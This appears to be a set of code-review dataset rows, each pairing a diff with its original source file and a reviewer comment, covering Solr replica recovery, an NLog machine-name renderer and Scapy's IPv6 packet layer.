if (successfulRecovery && replayFuture == null) {
log.info("Updating version bucket highest from index after successful recovery.");
core.seedVersionBuckets();
}
log.info("Finished recovery process, successful=[{}]", successfulRecovery);
}
/**
* Make sure we can connect to the shard leader as currently defined in ZK
* @param ourUrl if the leader url is the same as our url, we will skip trying to connect
*/
private final Replica pingLeader(String ourUrl, CoreDescriptor coreDesc, boolean mayPutReplicaAsDown)
throws Exception {
int numTried = 0;
while (true) {
CloudDescriptor cloudDesc = coreDesc.getCloudDescriptor();
DocCollection docCollection = zkStateReader.getClusterState().getCollection(cloudDesc.getCollectionName());
if (!isClosed() && mayPutReplicaAsDown && numTried == 1 &&
docCollection.getReplica(coreDesc.getCloudDescriptor().getCoreNodeName())
.getState() == Replica.State.ACTIVE) {
// this operation may take a long time, by putting replica into DOWN state, client won't query this replica
zkController.publish(coreDesc, Replica.State.DOWN);
}
numTried++;
Replica leaderReplica = null;
if (isClosed()) {
return leaderReplica;
}
try {
leaderReplica = zkStateReader.getLeaderRetry(
cloudDesc.getCollectionName(), cloudDesc.getShardId());
} catch (SolrException e) {
Thread.sleep(500);
continue;
}
if (leaderReplica.getCoreUrl().equals(ourUrl)) {
return leaderReplica;
}
try (HttpSolrClient httpSolrClient = buildRecoverySolrClient(leaderReplica.getCoreUrl())) {
SolrPingResponse resp = httpSolrClient.ping();
return leaderReplica;
} catch (IOException e) {
log.error("Failed to connect leader {} on recovery, try again", leaderReplica.getBaseUrl());
Thread.sleep(500);
} catch (Exception e) {
if (e.getCause() instanceof IOException) {
log.error("Failed to connect leader {} on recovery, try again", leaderReplica.getBaseUrl());
Thread.sleep(500);
} else {
return leaderReplica;
}
}
}
}
public static Runnable testing_beforeReplayBufferingUpdates;
final private Future<RecoveryInfo> replay(SolrCore core)
throws InterruptedException, ExecutionException {
if (testing_beforeReplayBufferingUpdates != null) {
testing_beforeReplayBufferingUpdates.run();
}
if (replicaType == Replica.Type.TLOG) {
// roll over all updates during buffering to new tlog, make RTG available
SolrQueryRequest req = new LocalSolrQueryRequest(core,
new ModifiableSolrParams());
core.getUpdateHandler().getUpdateLog().copyOverBufferingUpdates(new CommitUpdateCommand(req, false));
req.close();
return null;
}
Future<RecoveryInfo> future = core.getUpdateHandler().getUpdateLog().applyBufferedUpdates();
if (future == null) {
// no replay needed
log.info("No replay needed.");
} else {
log.info("Replaying buffered documents.");
// wait for replay
RecoveryInfo report = future.get();
if (report.failed) {
SolrException.log(log, "Replay failed");
throw new SolrException(ErrorCode.SERVER_ERROR, "Replay failed");
}
}
// the index may be ahead of the tlog's caches after recovery; calling this purges the tlog's caches
core.getUpdateHandler().getUpdateLog().openRealtimeSearcher();
// solrcloud_debug
cloudDebugLog(core, "replayed");
return future;
}
final private void cloudDebugLog(SolrCore core, String op) {
if (!log.isDebugEnabled()) {
return;
}
try {
RefCounted<SolrIndexSearcher> searchHolder = core.getNewestSearcher(false);
SolrIndexSearcher searcher = searchHolder.get();
try {
final int totalHits = searcher.count(new MatchAllDocsQuery());
final String nodeName = core.getCoreContainer().getZkController().getNodeName();
log.debug("[{}] {} [{} total hits]", nodeName, op, totalHits);
} finally {
searchHolder.decref();
}
} catch (Exception e) {
log.debug("Error in solrcloud_debug block", e);
}
}
final public boolean isClosed() {
return close || cc.isShutDown();
}
final private void sendPrepRecoveryCmd(String leaderBaseUrl, String leaderCoreName, Slice slice)
throws SolrServerException, IOException, InterruptedException, ExecutionException {
WaitForState prepCmd = new WaitForState();
prepCmd.setCoreName(leaderCoreName);
prepCmd.setNodeName(zkController.getNodeName());
prepCmd.setCoreNodeName(coreZkNodeName);
prepCmd.setState(Replica.State.RECOVERING);
prepCmd.setCheckLive(true);
prepCmd.setOnlyIfLeader(true);
final Slice.State state = slice.getState();
if (state != Slice.State.CONSTRUCTION && state != Slice.State.RECOVERY && state != Slice.State.RECOVERY_FAILED) {
prepCmd.setOnlyIfLeaderActive(true);
}
int conflictWaitMs = zkController.getLeaderConflictResolveWait();
// timeout after 5 seconds more than the max timeout (conflictWait + 3 seconds) on the server side
int readTimeout = conflictWaitMs + Integer.parseInt(System.getProperty("prepRecoveryReadTimeoutExtraWait", "8000"));
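// With the default extra wait of 8000ms this works out to conflictWaitMs + 8s,
// i.e. 5s of slack on top of the (conflictWait + 3s) server-side maximum noted above.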
try (HttpSolrClient client = buildRecoverySolrClient(leaderBaseUrl)) {
client.setSoTimeout(readTimeout);
HttpUriRequestResponse mrr = client.httpUriRequest(prepCmd);
prevSendPreRecoveryHttpUriRequest = mrr.httpUriRequest;
log.info("Sending prep recovery command to [{}]; [{}]", leaderBaseUrl, prepCmd);
mrr.future.get();
}
}
}
| 1 | 38,959 | We don't need this anymore after #2151 | apache-lucene-solr | java |
@@ -48,7 +48,7 @@ namespace NLog.LayoutRenderers
[AppDomainFixedOutput]
[ThreadAgnostic]
[ThreadSafe]
- public class MachineNameLayoutRenderer : LayoutRenderer, IStringValueRenderer
+ public class MachineNameLayoutRenderer : LayoutRenderer
{
internal string MachineName { get; private set; }
| 1 | //
// Copyright (c) 2004-2018 Jaroslaw Kowalski <[email protected]>, Kim Christensen, Julian Verdurmen
//
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
// * Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice,
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
//
// * Neither the name of Jaroslaw Kowalski nor the names of its
// contributors may be used to endorse or promote products derived from this
// software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
// THE POSSIBILITY OF SUCH DAMAGE.
//
#if !SILVERLIGHT
namespace NLog.LayoutRenderers
{
using System;
using System.Text;
using NLog.Common;
using NLog.Config;
using NLog.Internal;
/// <summary>
/// The machine name that the process is running on.
/// </summary>
[LayoutRenderer("machinename")]
[AppDomainFixedOutput]
[ThreadAgnostic]
[ThreadSafe]
public class MachineNameLayoutRenderer : LayoutRenderer, IStringValueRenderer
{
internal string MachineName { get; private set; }
/// <inheritdoc/>
protected override void InitializeLayoutRenderer()
{
base.InitializeLayoutRenderer();
try
{
MachineName = EnvironmentHelper.GetMachineName();
if (string.IsNullOrEmpty(MachineName))
{
InternalLogger.Info("MachineName is not available.");
}
}
catch (Exception exception)
{
InternalLogger.Error(exception, "Error getting machine name.");
if (exception.MustBeRethrown())
{
throw;
}
MachineName = string.Empty;
}
}
/// <inheritdoc/>
protected override void Append(StringBuilder builder, LogEventInfo logEvent)
{
builder.Append(MachineName);
}
/// <inheritdoc/>
string IStringValueRenderer.GetFormattedString(LogEventInfo logEvent) => MachineName;
}
}
#endif
| 1 | 17,960 | this is this removed? I don't understand in the context of this PR | NLog-NLog | .cs |
@@ -107,6 +107,9 @@ def getmacbyip6(ip6, chainCC=0):
(chainCC parameter value ends up being passed to sending function
used to perform the resolution, if needed)
"""
+
+ if isinstance(ip6,Net6):
+ ip6 = iter(ip6).next()
if in6_ismaddr(ip6): # Multicast
mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) | 1 | #! /usr/bin/env python
#############################################################################
## ##
## inet6.py --- IPv6 support for Scapy ##
## see http://natisbad.org/IPv6/ ##
## for more informations ##
## ##
## Copyright (C) 2005 Guillaume Valadon <[email protected]> ##
## Arnaud Ebalard <[email protected]> ##
## ##
## This program is free software; you can redistribute it and/or modify it ##
## under the terms of the GNU General Public License version 2 as ##
## published by the Free Software Foundation. ##
## ##
## This program is distributed in the hope that it will be useful, but ##
## WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ##
## General Public License for more details. ##
## ##
#############################################################################
"""
IPv6 (Internet Protocol v6).
"""
from __future__ import absolute_import
from __future__ import print_function
import random
import socket
import sys
import scapy.modules.six as six
from scapy.modules.six.moves import range
if not socket.has_ipv6:
raise socket.error("can't use AF_INET6, IPv6 is disabled")
if not hasattr(socket, "IPPROTO_IPV6"):
# Workaround for http://bugs.python.org/issue6926
socket.IPPROTO_IPV6 = 41
if not hasattr(socket, "IPPROTO_IPIP"):
# Workaround for https://bitbucket.org/secdev/scapy/issue/5119
socket.IPPROTO_IPIP = 4
from scapy.config import conf
from scapy.base_classes import *
from scapy.data import *
from scapy.compat import *
from scapy.fields import *
from scapy.packet import *
from scapy.volatile import *
from scapy.sendrecv import sr,sr1,srp1
from scapy.as_resolvers import AS_resolver_riswhois
from scapy.supersocket import SuperSocket,L3RawSocket
from scapy.arch import *
from scapy.utils6 import *
from scapy.layers.l2 import *
from scapy.layers.inet import *
from scapy.utils import inet_pton, inet_ntop, strxor
from scapy.error import warning
if conf.route6 is None:
# unused import, only to initialize conf.route6
import scapy.route6
#############################################################################
# Helpers ##
#############################################################################
def get_cls(name, fallback_cls):
return globals().get(name, fallback_cls)
##########################
## Neighbor cache stuff ##
##########################
conf.netcache.new_cache("in6_neighbor", 120)
@conf.commands.register
def neighsol(addr, src, iface, timeout=1, chainCC=0):
"""Sends an ICMPv6 Neighbor Solicitation message to get the MAC address of the neighbor with specified IPv6 address addr
'src' address is used as source of the message. Message is sent on iface.
By default, timeout waiting for an answer is 1 second.
If no answer is gathered, None is returned. Else, the answer is
returned (ethernet frame).
"""
nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
d = inet_ntop(socket.AF_INET6, nsma)
dm = in6_getnsmac(nsma)
p = Ether(dst=dm)/IPv6(dst=d, src=src, hlim=255)
p /= ICMPv6ND_NS(tgt=addr)
p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface))
res = srp1(p,type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0,
chainCC=chainCC)
return res
@conf.commands.register
def getmacbyip6(ip6, chainCC=0):
"""Returns the MAC address corresponding to an IPv6 address
neighborCache.get() method is used on instantiated neighbor cache.
Resolution mechanism is described in associated doc string.
(chainCC parameter value ends up being passed to sending function
used to perform the resolution, if needed)
"""
if in6_ismaddr(ip6): # Multicast
mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
return mac
iff,a,nh = conf.route6.route(ip6)
if isinstance(iff, six.string_types):
if iff == LOOPBACK_NAME:
return "ff:ff:ff:ff:ff:ff"
else:
if iff.name == LOOPBACK_NAME:
return "ff:ff:ff:ff:ff:ff"
if nh != '::':
ip6 = nh # Found next hop
mac = conf.netcache.in6_neighbor.get(ip6)
if mac:
return mac
res = neighsol(ip6, a, iff, chainCC=chainCC)
if res is not None:
if ICMPv6NDOptDstLLAddr in res:
mac = res[ICMPv6NDOptDstLLAddr].lladdr
else:
mac = res.src
conf.netcache.in6_neighbor[ip6] = mac
return mac
return None
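# Resolution sketch for the docstring above (hypothetical address): a call such
# as getmacbyip6("fe80::1") first handles the multicast case, then consults
# conf.route6 for the interface and next hop, then the conf.netcache.in6_neighbor
# cache, and only falls back to an on-the-wire neighsol() Neighbor Solicitation,
# caching whatever answer it gets.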
#############################################################################
#############################################################################
### IPv6 addresses manipulation routines ###
#############################################################################
#############################################################################
class Net6(Gen): # syntax ex. fec0::/126
"""Generate a list of IPv6s from a network address or a name"""
name = "ipv6"
ipaddress = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$")
def __init__(self, net):
self.repr = net
tmp = net.split('/')+["128"]
if not self.ipaddress.match(net):
tmp[0]=socket.getaddrinfo(tmp[0], None, socket.AF_INET6)[0][-1][0]
netmask = int(tmp[1])
self.net = inet_pton(socket.AF_INET6, tmp[0])
self.mask = in6_cidr2mask(netmask)
self.plen = netmask
def __iter__(self):
def m8(i):
if i % 8 == 0:
return i
tuple = [x for x in range(8, 129) if m8(x)]
a = in6_and(self.net, self.mask)
tmp = [x for x in struct.unpack("16B", a)]
def parse_digit(a, netmask):
netmask = min(8,max(netmask,0))
a = (int(a) & (0xff<<netmask),(int(a) | (0xff>>(8-netmask)))+1)
return a
self.parsed = list(map(lambda x,y: parse_digit(x,y), tmp, map(lambda x,nm=self.plen: x-nm, tuple)))
def rec(n, l):
if n and n % 2 == 0:
sep = ':'
else:
sep = ''
if n == 16:
return l
else:
ll = []
for i in range(*self.parsed[n]):
for y in l:
ll += [y+sep+'%.2x'%i]
return rec(n+1, ll)
return iter(rec(0, ['']))
def __repr__(self):
return "Net6(%r)" % self.repr
#############################################################################
#############################################################################
### IPv6 Class ###
#############################################################################
#############################################################################
class IP6Field(Field):
def __init__(self, name, default):
Field.__init__(self, name, default, "16s")
def h2i(self, pkt, x):
if isinstance(x, str):
try:
x = in6_ptop(x)
except socket.error:
x = Net6(x)
elif isinstance(x, list):
x = [Net6(a) for a in x]
return x
def i2m(self, pkt, x):
return inet_pton(socket.AF_INET6, plain_str(x))
def m2i(self, pkt, x):
return inet_ntop(socket.AF_INET6, x)
def any2i(self, pkt, x):
return self.h2i(pkt,x)
def i2repr(self, pkt, x):
if x is None:
return self.i2h(pkt,x)
elif not isinstance(x, Net6) and not isinstance(x, list):
if in6_isaddrTeredo(x): # print Teredo info
server, flag, maddr, mport = teredoAddrExtractInfo(x)
return "%s [Teredo srv: %s cli: %s:%s]" % (self.i2h(pkt, x), server, maddr,mport)
elif in6_isaddr6to4(x): # print encapsulated address
vaddr = in6_6to4ExtractAddr(x)
return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr)
return self.i2h(pkt, x) # No specific information to return
def randval(self):
return RandIP6()
class SourceIP6Field(IP6Field):
__slots__ = ["dstname"]
def __init__(self, name, dstname):
IP6Field.__init__(self, name, None)
self.dstname = dstname
def i2m(self, pkt, x):
if x is None:
dst=getattr(pkt,self.dstname)
iff,x,nh = conf.route6.route(dst)
return IP6Field.i2m(self, pkt, x)
def i2h(self, pkt, x):
if x is None:
if conf.route6 is None:
# unused import, only to initialize conf.route6
import scapy.route6
dst = ("::" if self.dstname is None else getattr(pkt, self.dstname))
if isinstance(dst, (Gen, list)):
r = {conf.route6.route(daddr) for daddr in dst}
if len(r) > 1:
warning("More than one possible route for %r" % (dst,))
x = min(r)[1]
else:
x = conf.route6.route(dst)[1]
return IP6Field.i2h(self, pkt, x)
class DestIP6Field(IP6Field, DestField):
bindings = {}
def __init__(self, name, default):
IP6Field.__init__(self, name, None)
DestField.__init__(self, name, default)
def i2m(self, pkt, x):
if x is None:
x = self.dst_from_pkt(pkt)
return IP6Field.i2m(self, pkt, x)
def i2h(self, pkt, x):
if x is None:
x = self.dst_from_pkt(pkt)
return IP6Field.i2h(self, pkt, x)
ipv6nh = { 0:"Hop-by-Hop Option Header",
4:"IP",
6:"TCP",
17:"UDP",
41:"IPv6",
43:"Routing Header",
44:"Fragment Header",
47:"GRE",
50:"ESP Header",
51:"AH Header",
58:"ICMPv6",
59:"No Next Header",
60:"Destination Option Header",
112:"VRRP",
132:"SCTP",
135:"Mobility Header"}
ipv6nhcls = { 0: "IPv6ExtHdrHopByHop",
4: "IP",
6: "TCP",
17: "UDP",
43: "IPv6ExtHdrRouting",
44: "IPv6ExtHdrFragment",
#50: "IPv6ExtHrESP",
#51: "IPv6ExtHdrAH",
58: "ICMPv6Unknown",
59: "Raw",
60: "IPv6ExtHdrDestOpt" }
class IP6ListField(StrField):
__slots__ = ["count_from", "length_from"]
islist = 1
def __init__(self, name, default, count_from=None, length_from=None):
if default is None:
default = []
StrField.__init__(self, name, default)
self.count_from = count_from
self.length_from = length_from
def i2len(self, pkt, i):
return 16*len(i)
def i2count(self, pkt, i):
if isinstance(i, list):
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
lst = []
ret = b""
remain = s
if l is not None:
remain,ret = s[:l],s[l:]
while remain:
if c is not None:
if c <= 0:
break
c -= 1
addr = inet_ntop(socket.AF_INET6, remain[:16])
lst.append(addr)
remain = remain[16:]
return remain+ret,lst
def i2m(self, pkt, x):
s = b""
for y in x:
try:
y = inet_pton(socket.AF_INET6, y)
except:
y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
y = inet_pton(socket.AF_INET6, y)
s += y
return s
def i2repr(self,pkt,x):
s = []
if x == None:
return "[]"
for y in x:
s.append('%s' % y)
return "[ %s ]" % (", ".join(s))
class _IPv6GuessPayload:
name = "Dummy class that implements guess_payload_class() for IPv6"
def default_payload_class(self,p):
if self.nh == 58: # ICMPv6
t = ord(p[0])
if len(p) > 2 and (t == 139 or t == 140): # Node Info Query
return _niquery_guesser(p)
if len(p) >= icmp6typesminhdrlen.get(t, sys.maxint): # Other ICMPv6 messages
return get_cls(icmp6typescls.get(t,"Raw"), "Raw")
return Raw
elif self.nh == 135 and len(p) > 3: # Mobile IPv6
return _mip6_mhtype2cls.get(ord(p[2]), MIP6MH_Generic)
elif self.nh == 43 and ord(p[2]) == 4: # Segment Routing header
return IPv6ExtHdrSegmentRouting
return get_cls(ipv6nhcls.get(self.nh, "Raw"), "Raw")
class IPv6(_IPv6GuessPayload, Packet, IPTools):
name = "IPv6"
fields_desc = [ BitField("version" , 6 , 4),
BitField("tc", 0, 8), #TODO: IPv6, ByteField ?
BitField("fl", 0, 20),
ShortField("plen", None),
ByteEnumField("nh", 59, ipv6nh),
ByteField("hlim", 64),
SourceIP6Field("src", "dst"), # dst is for src @ selection
DestIP6Field("dst", "::1") ]
def route(self):
dst = self.dst
if isinstance(dst,Gen):
dst = iter(dst).next()
return conf.route6.route(dst)
def mysummary(self):
return "%s > %s (%i)" % (self.src,self.dst, self.nh)
def post_build(self, p, pay):
p += pay
if self.plen is None:
l = len(p) - 40
p = p[:4]+struct.pack("!H", l)+p[6:]
return p
def extract_padding(self, s):
l = self.plen
return s[:l], s[l:]
def hashret(self):
if self.nh == 58 and isinstance(self.payload, _ICMPv6):
if self.payload.type < 128:
return self.payload.payload.hashret()
elif (self.payload.type in [133,134,135,136,144,145]):
return struct.pack("B", self.nh)+self.payload.hashret()
if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6
return self.payload.hashret()
nh = self.nh
sd = self.dst
ss = self.src
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
# With routing header, the destination is the last
# address of the IPv6 list if segleft > 0
nh = self.payload.nh
try:
sd = self.addresses[-1]
except IndexError:
sd = '::1'
# TODO: big bug with ICMPv6 error messages as the destination of IPerror6
# could be anything from the original list ...
if 1:
sd = inet_pton(socket.AF_INET6, sd)
for a in self.addresses:
a = inet_pton(socket.AF_INET6, a)
sd = strxor(sd, a)
sd = inet_ntop(socket.AF_INET6, sd)
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting):
# With segment routing header (rh == 4), the destination is
# the first address of the IPv6 addresses list
try:
sd = self.addresses[0]
except IndexError:
sd = self.dst
if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
nh = self.payload.nh
if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
nh = self.payload.nh
if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
foundhao = None
for o in self.payload.options:
if isinstance(o, HAO):
foundhao = o
if foundhao:
nh = self.payload.nh # XXX what if another extension follows ?
ss = foundhao.hoa
if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
sd = inet_pton(socket.AF_INET6, sd)
ss = inet_pton(socket.AF_INET6, self.src)
return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()
else:
return struct.pack("B", nh)+self.payload.hashret()
def answers(self, other):
if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP
if self.nh in [4, 41]:
return self.payload.answers(other)
if isinstance(other, IPv6) and other.nh in [4, 41]:
return self.answers(other.payload)
if isinstance(other, IP) and other.proto in [4, 41]:
return self.answers(other.payload)
if not isinstance(other, IPv6): # self is reply, other is request
return False
if conf.checkIPaddr:
ss = inet_pton(socket.AF_INET6, self.src)
sd = inet_pton(socket.AF_INET6, self.dst)
os = inet_pton(socket.AF_INET6, other.src)
od = inet_pton(socket.AF_INET6, other.dst)
# request was sent to a multicast address (other.dst)
# Check reply destination addr matches request source addr (i.e
# sd == os) except when reply is multicasted too
# XXX test mcast scope matching ?
if in6_ismaddr(other.dst):
if in6_ismaddr(self.dst):
if ((od == sd) or
(in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):
return self.payload.answers(other.payload)
return False
if (os == sd):
return self.payload.answers(other.payload)
return False
elif (sd != os): # or ss != od): <- removed for ICMP errors
return False
if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:
# ICMPv6 Error message -> generated by IPv6 packet
# Note : at the moment, we jump the ICMPv6 specific class
# to call answers() method of erroneous packet (over
# initial packet). There can be cases where an ICMPv6 error
# class could implement a specific answers method that perform
# a specific task. Currently, don't see any use ...
return self.payload.payload.answers(other)
elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
return self.payload.answers(other.payload.payload)
elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
return self.payload.answers(other.payload.payload)
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting):
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting
elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
return self.payload.payload.answers(other.payload.payload)
elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance
return self.payload.payload.answers(other.payload)
else:
if (self.nh != other.nh):
return False
return self.payload.answers(other.payload)
class _IPv46(IP):
"""
This class implements a dispatcher that is used to detect the IP version
while parsing Raw IP pcap files.
"""
@classmethod
def dispatch_hook(cls, _pkt=None, *_, **kargs):
if _pkt:
if struct.unpack('B', _pkt[0])[0] >> 4 == 6:
return IPv6
elif kargs.get("version") == 6:
return IPv6
return IP
def inet6_register_l3(l2, l3):
return getmacbyip6(l3.dst)
conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
class IPerror6(IPv6):
name = "IPv6 in ICMPv6"
def answers(self, other):
if not isinstance(other, IPv6):
return False
sd = inet_pton(socket.AF_INET6, self.dst)
ss = inet_pton(socket.AF_INET6, self.src)
od = inet_pton(socket.AF_INET6, other.dst)
os = inet_pton(socket.AF_INET6, other.src)
# Make sure that the ICMPv6 error is related to the packet scapy sent
if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
# find upper layer for self (possible citation)
selfup = self.payload
while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
selfup = selfup.payload
# find upper layer for other (initial packet). Also look for RH
otherup = other.payload
request_has_rh = False
while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
if isinstance(otherup, IPv6ExtHdrRouting):
request_has_rh = True
otherup = otherup.payload
if ((ss == os and sd == od) or # <- Basic case
(ss == os and request_has_rh)): # <- Request has a RH :
# don't check dst address
# Let's deal with possible MSS Clamping
if (isinstance(selfup, TCP) and
isinstance(otherup, TCP) and
selfup.options != otherup.options): # seems clamped
# Save fields modified by MSS clamping
old_otherup_opts = otherup.options
old_otherup_cksum = otherup.chksum
old_otherup_dataofs = otherup.dataofs
old_selfup_opts = selfup.options
old_selfup_cksum = selfup.chksum
old_selfup_dataofs = selfup.dataofs
# Nullify them
otherup.options = []
otherup.chksum = 0
otherup.dataofs = 0
selfup.options = []
selfup.chksum = 0
selfup.dataofs = 0
# Test it and save result
s1 = raw(selfup)
s2 = raw(otherup)
l = min(len(s1), len(s2))
res = s1[:l] == s2[:l]
# recall saved values
otherup.options = old_otherup_opts
otherup.chksum = old_otherup_cksum
otherup.dataofs = old_otherup_dataofs
selfup.options = old_selfup_opts
selfup.chksum = old_selfup_cksum
selfup.dataofs = old_selfup_dataofs
return res
s1 = raw(selfup)
s2 = raw(otherup)
l = min(len(s1), len(s2))
return s1[:l] == s2[:l]
return False
def mysummary(self):
return Packet.mysummary(self)
#############################################################################
#############################################################################
### Upper Layer Checksum computation ###
#############################################################################
#############################################################################
class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
name = "Pseudo IPv6 Header"
fields_desc = [ IP6Field("src", "::"),
IP6Field("dst", "::"),
ShortField("uplen", None),
BitField("zero", 0, 24),
ByteField("nh", 0) ]
def in6_chksum(nh, u, p):
"""
As Specified in RFC 2460 - 8.1 Upper-Layer Checksums
Performs IPv6 Upper Layer checksum computation. Provided parameters are:
- 'nh' : value of upper layer protocol
- 'u' : upper layer instance (TCP, UDP, ICMPv6*, ...). The instance must be
provided with all underlayers (IPv6 and all extension headers,
for example)
- 'p' : the payload of the upper layer provided as a string
The function operates by filling a pseudo header class instance (PseudoIPv6)
with
- Next Header value
- the address of the _final_ destination (if some Routing Header with a non-zero
segleft field is present in the underlayer classes, the last address is used.)
- the address of _real_ source (basically the source address of an
IPv6 class instance available in the underlayer or the source address
in HAO option if some Destination Option header found in underlayer
includes this option).
- the length is the length of provided payload string ('p')
"""
ph6 = PseudoIPv6()
ph6.nh = nh
rthdr = 0
hahdr = 0
final_dest_addr_found = 0
while u != None and not isinstance(u, IPv6):
if (isinstance(u, IPv6ExtHdrRouting) and
u.segleft != 0 and len(u.addresses) != 0 and
final_dest_addr_found == 0):
rthdr = u.addresses[-1]
final_dest_addr_found = 1
elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
isinstance(u.options[0], HAO)):
hahdr = u.options[0].hoa
u = u.underlayer
if u is None:
warning("No IPv6 underlayer to compute checksum. Leaving null.")
return 0
if hahdr:
ph6.src = hahdr
else:
ph6.src = u.src
if rthdr:
ph6.dst = rthdr
else:
ph6.dst = u.dst
ph6.uplen = len(p)
ph6s = raw(ph6)
return checksum(ph6s+p)
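# A minimal sketch of the computation described above: for an IPv6/UDP packet
# the UDP checksum covers a PseudoIPv6 header (src, dst, uplen set to the UDP
# length, nh=17) followed by the UDP header and data, which is roughly what
# in6_chksum(socket.IPPROTO_UDP, udp_layer, raw(udp_layer)) evaluates when the
# UDP instance (checksum field left at 0) is attached under an IPv6 layer.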
#############################################################################
#############################################################################
### Extension Headers ###
#############################################################################
#############################################################################
# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
name = 'Abstract IPV6 Option Header'
aliastypes = [IPv6, IPerror6] # TODO ...
#################### IPv6 options for Extension Headers #####################
_hbhopts = { 0x00: "Pad1",
0x01: "PadN",
0x04: "Tunnel Encapsulation Limit",
0x05: "Router Alert",
0x06: "Quick-Start",
0xc2: "Jumbo Payload",
0xc9: "Home Address Option" }
class _OTypeField(ByteEnumField):
"""
Modified ByteEnumField that displays information regarding the IPv6 option
based on its option type value (What should be done by nodes that process
the option if they do not understand it ...)
It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
"""
pol = {0x00: "00: skip",
0x40: "01: discard",
0x80: "10: discard+ICMP",
0xC0: "11: discard+ICMP not mcast"}
enroutechange = {0x00: "0: Don't change en-route",
0x20: "1: May change en-route" }
def i2repr(self, pkt, x):
s = self.i2s.get(x, repr(x))
polstr = self.pol[(x & 0xC0)]
enroutechangestr = self.enroutechange[(x & 0x20)]
return "%s [%s, %s]" % (s, polstr, enroutechangestr)
class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
name = "Scapy6 Unknown Option"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen) ]
def alignment_delta(self, curpos): # By default, no alignment requirement
"""
As specified in section 4.2 of RFC 2460, every option has
an alignment requirement usually expressed as xn+y, meaning
the Option Type must appear at an integer multiple of x octets
from the start of the header, plus y octets.
This function is given the current position from the
start of the header and returns the required padding length.
"""
return 0
class Pad1(Packet): # IPv6 Hop-By-Hop Option
name = "Pad1"
fields_desc = [ _OTypeField("otype", 0x00, _hbhopts) ]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class PadN(Packet): # IPv6 Hop-By-Hop Option
name = "PadN"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen)]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
name = "Router Alert"
fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
ByteField("optlen", 2),
ShortEnumField("value", None,
{ 0: "Datagram contains a MLD message",
1: "Datagram contains RSVP message",
2: "Datagram contains an Active Network message",
68: "NSIS NATFW NSLP",
69: "MPLS OAM",
65535: "Reserved" })]
